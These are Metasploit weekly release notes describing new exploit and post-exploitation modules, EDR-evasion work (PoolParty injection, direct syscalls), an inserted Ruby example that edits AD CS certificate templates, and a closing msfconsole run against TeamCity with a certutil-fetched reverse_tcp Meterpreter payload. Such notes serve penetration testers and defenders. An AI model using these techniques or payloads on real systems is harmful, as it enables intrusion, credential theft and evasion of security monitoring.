GameOver(lay) Privilege Escalation and Container Escape

Metasploit Weekly Wrap-Up 12/20/2024

New module content (4)

GameOver(lay) Privilege Escalation and Container Escape

Authors: bwatters-r7, g1vi, gardnerapp, and h00die
Type: Exploit
Pull request: #19460 contributed by gardnerapp
Path: linux/local/gameoverlay_privesc
AttackerKB reference: CVE-2023-2640

Description: Adds a module for CVE-2023-2640 and CVE-2023-32629, a local privilege escalation in some Ubuntu kernel versions. The bugs abuse OverlayFS copy-up behaviour that trusted file capabilities (security.capability xattrs) set from inside an unprivileged user namespace, giving an unprivileged user a capability-bearing binary on the host.

Clinic's Patient Management System 1.0 - Unauthenticated RCE

Authors: Aaryan Golatkar and Oğulcan Hami Gül
Type: Exploit
Pull request: #19733 contributed by aaryan-11-x
Path: multi/http/clinic_pms_fileupload_rce
AttackerKB reference: CVE-2022-40471

Description: New exploit module for Clinic's Patient Management System 1.0 that targets CVE-2022-40471. The module exploits unrestricted file upload, which can be further used to get remote code execution (RCE) through a malicious PHP file.

WordPress WP Time Capsule Arbitrary File Upload to RCE

Authors: Rein Daelman and Valentin Lobstein
Type: Exploit
Pull request: #19713 contributed by Chocapikk
Path: multi/http/wp_time_capsule_file_upload_rce
AttackerKB reference: CVE-2024-8856

Description: This module exploits a remote code execution (RCE) vulnerability (CVE-2024-8856) in the WordPress WP Time Capsule plugin (versions ≤ 1.22.21). Improper validation in the plugin allows unauthenticated attackers to upload and execute arbitrary files.

WSO2 API Manager Documentation File Upload Remote Code Execution

Authors: Heyder Andrade <@HeyderAndrade>, Redway Security <redwaysecurity.com>, and Siebene@ <@Siebene7>
Type: Exploit
Pull request: #19647 contributed by heyder
Path: multi/http/wso2_api_manager_file_upload_rce
AttackerKB reference: CVE-2023-2988

Description: Adds an exploit module for a vulnerability in the 'Add API Documentation' feature of WSO2 API Manager (CVE-2023-2988) that allows malicious users with specific permissions to upload arbitrary files to a user-controlled server location. This flaw allows for RCE on the target system.

Enhancements and features (4)

  • #19546 from adfoster-r7 - Improves the database module cache performance from ~3 minutes to ~1 minute by performing bulk inserts of module metadata instead of multiple smaller inserts for every module/reference/author/etc.
  • #19660 from zeroSteiner - Updates OptEnum to validate values without being case sensitive while preserving the case the author was expecting.
  • #19715 from oddlittlebird - Improves db/README.md documentation.
  • #19718 from sjanusz-r7 - Expose the currently authenticated rpc_token to RPC handlers.

Bugs fixed (4)

  • #19719 from bwatters-r7 - Fixed a syntax error in the code generated by fetch payloads when the FETCH_DELETE option was enabled.
  • #19721 from bwatters-r7 - This updates the way the module checks the Windows build version to determine if it's vulnerable to CVE-2020-0668.
  • #19726 from pczinser - The reverse HTTP and HTTPS Meterpreter x64 payloads now correctly set the User-Agent HTTP header when connecting back to Metasploit. Before this fix, the HttpUserAgent option was not used properly. You can now use this option to customize the User-Agent HTTP header when using these payloads.
  • #19739 from sjanusz-r7 - Fixes an issue with the post/multi/recon/local_exploit_suggester module which would crash if a TARGET value was set.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.

Pool Party Windows Process Injection

Metasploit Weekly Wrap-Up 11/01/2024

This Metasploit Framework release includes a new injection technique, now used by core Meterpreter functionality such as process migration and DLL injection.
The PoolParty research described new ways to gain code execution in a remote process by abusing the Windows thread-pool internals that have shipped since Windows Vista. While integrating the technique into the Meterpreter code base we ran into some technical challenges that we would like to share. Meterpreter currently relies on the (in)famous kernel32!CreateRemoteThread to achieve code injection. Although every EDR nowadays should be able to block an injection that uses this API, it is still the most feature-rich way to inject code into a target process. Our goal while porting PoolParty was to find the variant that best fits our needs:

  • Able to pass a parameter pointer
  • Able to be injected first and executed later, like a suspended thread
  • Able to inject from and into WoW64 processes
  • Leave as few footprints as possible in the target process

From the Original Pool Party PoC we selected three candidates:

  • TP_WAIT_INSERTION
  • TP_DIRECT_INSERTION
  • WORKER_THREAD_FACTORY_OVERWRITE

To keep the flexibility offered by CreateRemoteThread, we developed an intermediate stub that takes care of correct parameter ordering, controlled execution through a duplicated handle, and cleanup of the injection after successful execution. The migration chain therefore looks like this:

Participants: Metasploit-Framework, Meterpreter and the Target Process. The framework sends the migration request to Meterpreter; the remaining steps are carried out by Meterpreter against the target process:

  1. Request Migration
  2. Inject PoolParty Stub
  3. Inject PoolParty Context
  4. Inject Migration Stub
  5. Inject Migration Context
  6. Inject Stageless Payload
  7. Inject Payload Config
  8. Start PoolParty Stub (Suspended)
  9. Start Migration Process
  10. Sleep 20 seconds
  11. Resume PoolParty Stub Thread

Pool-Party Stub Details

Argument Passing

Whether an argument can be passed depends on the variant: some variants allow it and some do not. During our research we investigated and tested the following two variants for argument passing.

  • TP_WAIT_INSERTION
  • TP_DIRECT_INSERTION

Even though TP_WAIT_INSERTION supports passing an argument pointer, the WaitCallback prototype expects that parameter in the second position rather than the first, which makes an intermediate stub necessary to avoid hot-patching the lpMigrationStub provided by the framework.

To have a unified stub that works across all variants, we decided not to use variant-specific argument passing and instead retrieve our data from the end of the shellcode.

Delayed Execution

To obtain suspended-thread-like behaviour with PoolParty, we create an event (hEvent) and duplicate its HANDLE into the target process. When step 8 of the migration chain runs, execution is delayed by a WaitForSingleObject on that event inside the target process and later released by Meterpreter calling SetEvent on the duplicated handle.

Execution Cleanup

In the original PoC's shellcode, execution ends in an infinite loop that prevents the thread from returning. In our investigation we observed different outcomes depending on the variant used for the injection; we were able to clean up the execution successfully with the TP_DIRECT_INSERTION variant.

Injection Features and Limits

Currently the PoolParty injection works on all 64-bit systems with a Windows kernel >= 10.0, and supports injection from x64 -> x64 and from WoW64 -> x64. There is no support yet for systems between Windows Vista and Windows 8.1, and the WoW64 injections are only partially implemented because of some security restrictions.
Feel free to share feedback, issues or requests for further coverage by opening an issue on GitHub or by sending a message on our Metasploit Slack server.

New module content (3)

WordPress Ultimate Member SQL Injection (CVE-2024-1071)

Authors: Christiaan Swiers and Valentin Lobstein
Type: Auxiliary
Pull request: #19488 contributed by Chocapikk
Path: scanner/http/wp_ultimate_member_sorting_sqli
AttackerKB reference: CVE-2024-1071

Description: This adds a new auxiliary module to exploit an unauthenticated SQL injection vulnerability in the Ultimate Member plugin for WordPress versions 2.1.3 to 2.8.2. The vulnerability allows an unauthenticated attacker to extract sensitive data via the sorting parameter.

WordPress wp-automatic Plugin SQLi Admin Creation

Authors: Rafie Muhammad and Valentin Lobstein
Type: Exploit
Pull request: #19489 contributed by Chocapikk
Path: multi/http/wp_automatic_sqli_to_rce
AttackerKB reference: CVE-2024-27956

Description: This adds a new exploit module for the SQL injection vulnerability in the WordPress wp-automatic plugin, affecting versions prior to 3.92.1. The vulnerability allows unauthenticated attackers to inject SQL commands, enabling them to create a malicious administrator account. Using the newly created admin account, the attacker can upload a plugin and achieve remote code execution.

Advanced Browser Data Extraction for Chromium and Gecko Browsers

Author: Alexander "xaitax" Hagenah
Type: Post
Pull request: #19506 contributed by xaitax
Path: windows/gather/enum_browsers

Description: Adds a new post-exploitation post/windows/gather/enum_browsers module which extracts sensitive browser data from both Chromium-based and Gecko-based browsers on the target system. It supports the decryption of passwords and cookies using Windows Data Protection API (DPAPI) and can extract additional data such as browsing history, keyword search history, download history, autofill data, credit card information, browser cache and installed extensions.

Enhanced Modules (1)

Modules which have either been enhanced or renamed:

  • #19527 from Chocapikk - Updates the exploit/multi/http/wp_givewp_rce module with a patch bypass. This module is now compatible with GiveWP version 3.16.1.

Enhancements and features (2)

  • #19597 from zeroSteiner - Fixes symlink and junction detection in the Python Windows Meterpreter.
  • #19600 from adfoster-r7 - Marks the Windows post modules gather/credentials/seamonkey, gather/credentials/chrome, and gather/enum_chrome as superseded by windows/gather/enum_browsers.

Bugs fixed (3)

  • #19551 from smashery - This fixes an issue when the LDAP session feature is enabled that caused the USERNAME and PASSWORD datastore options to be required, despite not being necessary when the configuration is set to kerberos or schannel.
  • #19553 from smashery - This fixes a bug in modules that use Kerberos authentication where when the KrbOfferedEncryptionTypes datastore option was set, it would be ignored instead of used to select a compatible ticket from the cache.
  • #19607 from adfoster-r7 - Fixes a bug that caused tables to render incorrectly when running under docker.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro


Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276)

Metasploit Weekly Wrap-Up 08/23/2024

New module content (3)

Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276)

Authors: Michael Heinzl and Tenable
Type: Auxiliary
Pull request: #19373 contributed by h4x-x0r
Path: admin/http/fortra_filecatalyst_workflow_sqli
AttackerKB reference: CVE-2024-5276

Description: This adds an auxiliary module to exploit CVE-2024-5276, a SQL injection vulnerability that allows an arbitrary administrative user to be added to the application.

SPIP Unauthenticated RCE via porte_plume Plugin

Authors: Julien Voisin, Laluka, and Valentin Lobstein
Type: Exploit
Pull request: #19394 contributed by Chocapikk
Path: multi/http/spip_porte_plume_previsu_rce

Description: Adds a new exploit/multi/http/spip_porte_plume_previsu_rce SPIP unauthenticated remote code execution (RCE) module targeting SPIP versions up to and including 4.2.12.

DIAEnergie SQL Injection (CVE-2024-4548)

Authors: Michael Heinzl and Tenable
Type: Exploit
Pull request: #19351 contributed by h4x-x0r
Path: windows/scada/diaenergie_sqli
AttackerKB reference: CVE-2024-4548

Description: This adds an exploit module for CVE-2024-4548, an unauthenticated SQL injection vulnerability that allows remote code execution as NT AUTHORITY\SYSTEM.

Bugs fixed (1)

  • #19366 from adeherdt-r7 - Updates the Jenkins login scanner to correctly determine whether authentication is required.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro


Telerik Report Server Auth Bypass

Metasploit Weekly Wrap-Up 06/14/2024

New module content (5)

Telerik Report Server Auth Bypass

Authors: SinSinology and Spencer McIntyre
Type: Auxiliary
Pull request: #19242 contributed by zeroSteiner
Path: scanner/http/telerik_report_server_auth_bypass
AttackerKB reference: CVE-2024-4358

Description: This adds an auxiliary module for CVE-2024-4358, an authentication bypass in Telerik Report Server versions up to and including 10.0.24.305.

Cacti Import Packages RCE

Authors: Christophe De La Fuente and Egidio Romano
Type: Exploit
Pull request: #19196 contributed by cdelafuente-r7
Path: multi/http/cacti_package_import_rce
AttackerKB reference: CVE-2024-25641

Description: This exploit module leverages an arbitrary file write vulnerability (CVE-2024-25641) in Cacti versions prior to 1.2.27 to achieve RCE. It abuses the Import Packages feature to upload a specially crafted package that embeds a PHP file.

VSCode ipynb Remote Development RCE

Authors: Zemnmez and h00die
Type: Exploit
Pull request: #18998 contributed by h00die
Path: multi/misc/vscode_ipynb_remote_dev_exec
AttackerKB reference: CVE-2022-41034

Description: VSCode allows users to open a Jupyter notebook (.ipynb) file. Versions v1.4.0 - v1.71.1 allow the Jupyter notebook to embed HTML and JavaScript, which can then open new terminal windows within VSCode. Each of these new windows can then execute arbitrary code at startup. This vulnerability is tracked as CVE-2022-41034.

Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution

Authors: Arseniy Sharoglazov and sfewer-r7
Type: Exploit
Pull request: #19240 contributed by sfewer-r7
Path: windows/http/rejetto_hfs_rce_cve_2024_23692
AttackerKB reference: CVE-2024-23692

Description: Adds an exploit module for CVE-2024-23692, an unauthenticated server-side template injection (SSTI) in the Rejetto HTTP File Server (HFS).

Telerik Report Server Auth Bypass and Deserialization RCE

Authors: SinSinology, Soroush Dalili, Spencer McIntyre, and Unknown
Type: Exploit
Pull request: #19243 contributed by zeroSteiner
Path: windows/http/telerik_report_server_deserialization
AttackerKB reference: CVE-2024-4358

Description: This adds an exploit for CVE-2024-1800 which is an authenticated RCE in Telerik Report Server. To function without authentication it chains CVE-2024-4358 to create a new administrator account before launching the authenticated RCE.

Enhancements and features (4)

  • #19191 from adfoster-r7 - Adds support for Ruby 3.4.0-preview1.
  • #19197 from sjanusz-r7 - Updates the new PostgreSQL, MSSQL, and MySQL session types to track the history of commands that the user has entered.
  • #19199 from cgranleese-r7 - Updates brute force modules to output a summary of the credential discovered. This functionality is currently opt-in with the feature set show_successful_logins true msfconsole command.
  • #19225 from h00die - This adds a link to android payload issues to increase visibility.

Bugs fixed (3)

  • #19235 from cgranleese-r7 - Fixes an issue where Java payloads zip paths were not being created properly.
  • #19239 from e2002e - Updates the modules/auxiliary/gather/zoomeye_search module to work again.
  • #19248 from zgoldman-r7 - This removes an extra rescue clause added in error and allows the actual rescue clause to rescue exceptions properly in the event a staged http[s] payload calls back to a stageless http[s] listener.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro


New ESC4 Templates for AD CS

Metasploit Weekly Wrap-Up 04/05/2024

Metasploit added capabilities for exploiting the ESC family of flaws in AD CS in Metasploit 6.3. The ESC4 technique in particular has been supported for some time now thanks to the ad_cs_cert_templates module, which enables users to read and write certificate template objects. ESC4 is a misconfiguration in the access controls of the certificate template's LDAP object that allows an attacker to tamper with it. An attacker typically uses this to modify a certificate template object they have write access to and make it susceptible to ESC1. Metasploit offers a premade template for ESC1 that a user can select to perform this attack.

This attack workflow was expanded this week with two new templates for ESC2 and ESC3. These give Metasploit users who are concerned about ESC1 being detected alternative options for exploitation. Additionally, the premade templates can be edited, for example to restrict permissions to a particular SID by changing the SDDL text of the ntSecurityDescriptor.
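As an added example, not part of the original post and not code from Metasploit's ad_cs_cert_templates module, the Ruby below shows two checks that go with the workflow above: whether a template's attributes make it ESC1-susceptible, and how to rewrite a template's ntSecurityDescriptor SDDL so that the enrollment and other rights a premade template grants to broad groups are restricted to one SID. The sample template attributes and the SDDL string are constructed for this example; the Certificate-Enrollment right GUID, the msPKI flag bits and the EKU OIDs are the standard AD CS values.

```ruby
# Added example: ESC1 susceptibility check and SDDL trustee rewrite for an
# AD CS certificate template. Not Metasploit code; sample data is constructed.

CERT_ENROLLMENT_RIGHT = '0e10c968-78fb-11d2-90d4-00c04f79dc55' # Certificate-Enrollment extended right
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001 # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002         # bit in msPKI-Enrollment-Flag (manager approval)
# Client auth, smart card logon, PKINIT client auth, any purpose
AUTH_EKUS = %w[1.3.6.1.5.5.7.3.2 1.3.6.1.4.1.311.20.2.2 1.3.6.1.5.2.3.4 2.5.29.37.0].freeze
# SDDL abbreviations for broad groups: Authenticated Users, Everyone, Domain Users, Builtin Users
BROAD_TRUSTEES = %w[AU WD DU BU].freeze

# Constructed template, as the attributes would come back from LDAP.
SAMPLE_TEMPLATE = {
  'msPKI-Certificate-Name-Flag' => 0x1,
  'msPKI-Enrollment-Flag'       => 0x0,
  'msPKI-RA-Signature'          => 0,
  'pKIExtendedKeyUsage'         => ['1.3.6.1.5.5.7.3.2'],
  'nTSecurityDescriptor'        => 'O:DAG:DAD:AI' \
    '(OA;;CR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;AU)' \
    '(A;;LCRPLORC;;;AU)' \
    '(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;DA)'
}.freeze

# ESC1: requester supplies the subject, no manager approval, no RA signatures,
# and an EKU usable for authentication (an empty EKU list also allows it).
def esc1_susceptible?(t)
  supplies_subject = (t.fetch('msPKI-Certificate-Name-Flag', 0) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) != 0
  needs_approval   = (t.fetch('msPKI-Enrollment-Flag', 0) & CT_FLAG_PEND_ALL_REQUESTS) != 0
  ekus = Array(t['pKIExtendedKeyUsage'])
  auth_eku = ekus.empty? || ekus.any? { |oid| AUTH_EKUS.include?(oid) }
  supplies_subject && !needs_approval && auth_eku && t.fetch('msPKI-RA-Signature', 0).zero?
end

# Split 'O:...G:...D:...S:...' into its components (no colons occur inside SIDs or ACEs).
def parse_sddl(sddl)
  sddl.scan(/([OGDS]):((?:(?![OGDS]:).)*)/).to_h
end

# Trustees holding the enrollment right (object ACE on the enrollment GUID) or generic all.
def enrollment_trustees(sddl)
  dacl = parse_sddl(sddl).fetch('D', '')
  dacl.scan(/\(([^)]*)\)/).flatten.each_with_object([]) do |ace, out|
    type, _flags, rights, object, _inherit, trustee = ace.split(';', -1)
    tokens = rights.to_s.scan(/../)
    enroll = type == 'OA' && tokens.include?('CR') && object.to_s.casecmp?(CERT_ENROLLMENT_RIGHT)
    full   = type == 'A' && tokens.include?('GA')
    out << trustee if enroll || full
  end
end

# Rewrite every allow ACE granted to a broad group so that it names `sid` instead,
# leaving owner, group, DACL flags and all other ACEs untouched.
def restrict_dacl_to_sid(sddl, sid, broad: BROAD_TRUSTEES)
  parts = parse_sddl(sddl)
  raise ArgumentError, 'SDDL has no DACL' unless parts['D']
  dacl_flags = parts['D'][/\A[^(]*/]
  aces = parts['D'].scan(/\(([^)]*)\)/).flatten.map do |ace|
    f = ace.split(';', -1)
    f[5] = sid if %w[A OA].include?(f[0]) && broad.include?(f[5])
    "(#{f.join(';')})"
  end
  parts['D'] = dacl_flags + aces.join
  %w[O G D S].map { |k| parts[k] && "#{k}:#{parts[k]}" }.compact.join
end

if __FILE__ == $PROGRAM_NAME
  puts "ESC1 susceptible: #{esc1_susceptible?(SAMPLE_TEMPLATE)}"
  puts "Enrollment trustees: #{enrollment_trustees(SAMPLE_TEMPLATE['nTSecurityDescriptor']).inspect}"
  puts restrict_dacl_to_sid(SAMPLE_TEMPLATE['nTSecurityDescriptor'], 'S-1-5-21-1111-2222-3333-1105')
end
```

The rewrite keeps ACEs for the owner group (DA here) intact, so an administrator's view of the template does not change; only the broad-group ACEs that the premade template relies on are narrowed to the one SID that will enroll.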

New module content (2)

WatchGuard XTM Firebox Unauthenticated Remote Command Execution

Authors: Charles Fol (Ambionics Security), Dylan Pindur (AssetNote), Misterxid, and h00die-gr3y h00die.gr3y@gmail.com
Type: Exploit
Pull request: #18915 contributed by h00die-gr3y
Path: linux/http/watchguard_firebox_unauth_rce_cve_2022_26318
AttackerKB reference: CVE-2022-26318

Description: This PR adds a module for a buffer overflow in the administration interface of WatchGuard Firebox and XTM appliances. The appliances are built from a CherryPy Python backend that sends XML-RPC requests to a C binary called wgagent, reachable through the pre-authentication endpoint /agent/login. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2. Successful exploitation results in remote code execution as the user nobody.

Jenkins CLI Ampersand Replacement Arbitrary File Read

Authors: Vozec, Yaniv Nizry, binganao, h00die, and h4x0r-dz
Type: Auxiliary
Pull request: #18764 contributed by h00die
Path: gather/jenkins_cli_ampersand_arbitrary_file_read
AttackerKB reference: CVE-2024-23897

Description: This PR adds a new module to exploit CVE-2024-23897, an unauthenticated arbitrary file read (limited to the first 2 lines of a file) on Jenkins versions prior to 2.442 or, for the LTS stream, versions prior to 2.426.3.

Enhancements and features (4)

  • #18906 from zeroSteiner - This PR adds support for leveraging the ESC4 attack on misconfigured AD-CS servers to introduce ESC2 and ESC3.
  • #18933 from sjanusz-r7 - Updates the new SQL session types to correctly remember previous commands that the user has entered.
  • #19003 from ArchiMoebius - Updates msfvenom and payload generation to support formatting payloads as a Zig buffer.
  • #19014 from cgranleese-r7 - Adds an initial set of acceptance tests for MySQL modules and session types.

Bugs fixed (3)

  • #18935 from zeroSteiner - This PR fixes a common user mistake when authenticating with LDAP modules. Now, users can specify either the USERNAME (user) and DOMAIN (domain.local) datastore options or the original format of just the USERNAME in the UPN format (user@domain.local). This fix updates the LDAP library.
  • #19007 from dwelch-r7 - Fixes a regression that affected exploit/multi/http/log4shell_header_injection module which stopped the module from running successfully.
  • #19021 from cgranleese-r7 - Updates the admin/mysql/mysql_enum module to work with newer versions of MySQL.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Direct Syscalls Support for Windows Meterpreter

Metasploit Weekly Wrap-Up 01/26/24

Direct system calls are a well-known technique that is often used to bypass EDR/AV detection. This technique is particularly useful when dynamic analysis is performed, where the security software monitors every process on the system to detect any suspicious activity. One common way to do so is to add user-land hooks on Win32 API calls, especially those commonly used by malware. Direct syscalls are a way to run system calls directly and enter kernel mode without passing through the Win32 API.

This first implementation focuses on substituting the Win32 API calls used by the Reflective DLL Injection (RDI) library with Direct Syscalls to the corresponding Native API's. For example, VirtualAlloc has been substituted by a system call to ZwAllocateVirtualMemory. Since RDI is used everywhere by Meterpreter and its extensions, it was a very good candidate for this initial work.

The main difficulty is finding the correct syscall number, since it is not the same across Windows versions. Also, EDRs usually hook the NTDLL native API, which makes discovering syscall numbers more challenging. The technique used here relies on the fact that syscall numbers are assigned sequentially, starting from 0, in the same order as the stubs are laid out in memory: if we look at how native API functions are stored in ntdll.dll, the syscall number can be deduced from the position of the related function in memory. The technique consists of selecting the system call functions (Zw…) from the ntdll.dll exports and sorting them in ascending order of their memory addresses. The syscall number of a given native API function is simply its index in this sorted list. This is very similar to the technique used by Halo's Gate.

Another improvement is to make sure the call to the syscall instruction is made through ntdll.dll. EDR/AV can monitor this and flag any system calls not coming from ntdll.dll as suspicious. This technique is directly taken from RecycledGate. Here, the complexity is that Meterpreter must be compatible with all Windows versions from WinXP to the most recent flavors. This implementation will take care of parsing ntdll.dll and get the correct trampoline address that will be used when the system call is executed.

This work is a first step and we expect more additions this year. The next step is to switch additional Win32 API requests that Meterpreter and its extensions make to their corresponding native API using Direct Syscalls. The long-term goal is to make Direct Syscalls a standard for any future Windows-based development (payload, exploit, etc.).

New module content (8)

GL.iNet Unauthenticated Remote Command Execution via the logread module

Authors: DZONERZY, Unknown, and h00die-gr3y h00die.gr3y@gmail.com
Type: Exploit
Pull request: #18648 contributed by h00die-gr3y
Path: linux/http/glinet_unauth_rce_cve_2023_50445

Description: This PR adds an exploit module for a number of different GL.iNet network products. The module chains an authentication bypass (CVE-2023-50919) with an RCE (CVE-2023-50445), allowing the user to obtain, remotely and without authentication, a Meterpreter session running as root.

Ivanti Connect Secure Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18708 contributed by sfewer-r7
Path: linux/http/ivanti_connect_secure_rce_cve_2023_46805

Description: This PR adds an exploit chain that consists of two vulnerabilities, an authentication bypass (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887). The exploit chain allows a remote unauthenticated attacker to execute arbitrary OS commands with root privileges. As per the Ivanti advisory, these vulnerabilities affect all supported versions of the products, versions 9.x and 22.x. It is unknown if the unsupported versions 8.x and older are also affected.

MajorDoMo Command Injection

Authors: Valentin Lobstein and smcintyre-r7
Type: Exploit
Pull request: #18630 contributed by Chocapikk
Path: linux/http/majordomo_cmd_inject_cve_2023_50917

Description: This adds an exploit for a command injection vulnerability in MajorDoMo versions before 0662e5e.

Saltstack Minion Payload Deployer

Authors: c2Vlcgo and h00die
Type: Exploit
Pull request: #18626 contributed by h00die
Path: linux/local/saltstack_salt_minion_deployer

Description: This PR adds an exploit module which allows for a user who has compromised a host acting as a SaltStack Master to deploy payloads to the Minions attached to that Master.

Apache Commons Text RCE

Authors: Alvaro Muñoz, Gaurav Jain, and Karthik UJ
Type: Exploit
Pull request: #18638 contributed by errorxyz
Path: multi/http/apache_commons_text4shell

Description: Adds an exploit module for CVE-2022-42889 that targets web apps using the StringSubstitutor interpolator class of Apache Commons Text (versions 1.5 to 1.9) in an insecure fashion.

Atlassian Confluence SSTI Injection

Authors: Harsh Jaiswal, Rahul Maini, and Spencer McIntyre
Type: Exploit
Pull request: #18734 contributed by zeroSteiner
Path: multi/http/atlassian_confluence_rce_cve_2023_22527

Description: This adds an exploit for CVE-2023-22527 which is an unauthenticated RCE in Atlassian Confluence. The vulnerability is due to an SSTI flaw that allows an OGNL expression to be evaluated. The result is OS command execution in the context of the service account.

PRTG CVE-2023-32781 Authenticated RCE

Author: Kevin Joensen kevin@baldur.dk
Type: Exploit
Pull request: #18568 contributed by ggisz
Path: windows/http/prtg_authenticated_rce_cve_2023_32781

Description: This PR adds a module leveraging CVE-2023-32781, an authenticated command injection vulnerability in PRTG versions 23.2.84.1566 and earlier. The result is command execution as SYSTEM.

Memory Search

Author: sjanusz-r7
Type: Post
Pull request: #18713 contributed by sjanusz-r7
Path: multi/gather/memory_search

Description: Adds a new multi/gather/memory_search module that can read memory of processes on Windows and Linux hosts with Meterpreter. Regular expressions can be used to find passwords/credentials, and glob patterns and PIDs can be used to identify target processes.

Enhancements and features (6)

  • #17634 from adfoster-r7 - Reliability and stability notes that have been previously missing have been added to some modules.
  • #18645 from jvoisin - This adds a way to get the Build ID from ld.so by using the 'perf' command. Previously, this module depended on the 'file' and 'readelf' commands being installed to get the Build ID.
  • #18663 from sjanusz-r7 - Adds a new Postgres session type, which is currently behind a feature flag that can be activated with: features set postgresql_session_type true. Example usage: use scanner/postgres/postgres_login followed by run postgres://postgres:password@127.0.0.1:9000/template1 createsession=true verbose=false.
  • #18720 from zeroSteiner - This enhancement marks the existing Unix encoders as also being compatible with Linux. Previously, no encoder modules were marked as compatible with Linux, so users could not set bad characters when using the new fetch payloads.
  • #18735 from AleksaZatezalo - Adds additional module metadata to the exploits/windows/iis/iis_webdav_scstoragepathfromurl module.
  • #18737 from zeroSteiner - This updates metasploit-payloads gem to 2.0.165 to pull in changes to support direct syscalls for Meterpreter on Windows. See this PR and this PR for details.

Bugs fixed (3)

  • #18662 from dwelch-r7 - Fixes an edge case where features set dns_feature true did not correctly parse a user's /etc/resolv.conf file if multiple nameservers were present.
  • #18712 from ekalinichev-r7 - Fixes a crash with Metasploit's REST api when calling /api/v1/modules?name=aux.
  • #18746 from zeroSteiner - Fixes a module bug when using the generate OPTION=VALUE syntax. Previously, the module's datastore would be unintentionally updated with the new option value.

Documentation added (1)

  • #18729 from poupapaa - This fixes a typo in Metasploit-Guide-SMB.md.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

TeamCity authentication bypass and remote code execution

Metasploit Weekly Wrap-Up

This week’s Metasploit release includes a new module for a critical authentication bypass in JetBrains TeamCity CI/CD Server. All versions of TeamCity prior to version 2023.05.4 are vulnerable to this issue. The vulnerability was originally discovered by SonarSource, and the Metasploit module was developed by Rapid7’s Principal Security Researcher Stephen Fewer who additionally published a technical analysis on AttackerKB for CVE-2023-42793. A Rapid7 TeamCity customer advisory has also been released with details on mitigation guidance.

This exploit works against both Windows and Linux targets. Example usage:

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options 

Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793):

   Name                     Current Setting  Required  Description
   ----                     ---------------  --------  -----------
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                   192.168.159.10   yes       The target host(s)
   RPORT                    8111             yes       The target port (TCP)
   SSL                      false            no        Negotiate SSL/TLS for outgoing connections
   TEAMCITY_ADMIN_ID        1                yes       The ID of an administrator account to authenticate as
   TEAMCITY_CHANGE_TIMEOUT  30               yes       The timeout to wait for the changes to be applied
   VHOST                                     no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      cymQYMMk         no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > exploit

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.05.3 (build 129390) detected.
[*] Token already exists, deleting and generating a new one.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.UUxBSk0zMGk1eWFzRGZRYjg3LWJqWVVrY1Fn.YjU0NmIwYjUtNTZmNC00N2U3LWI4MGItMDdhOTQ0YjIzZGQ5
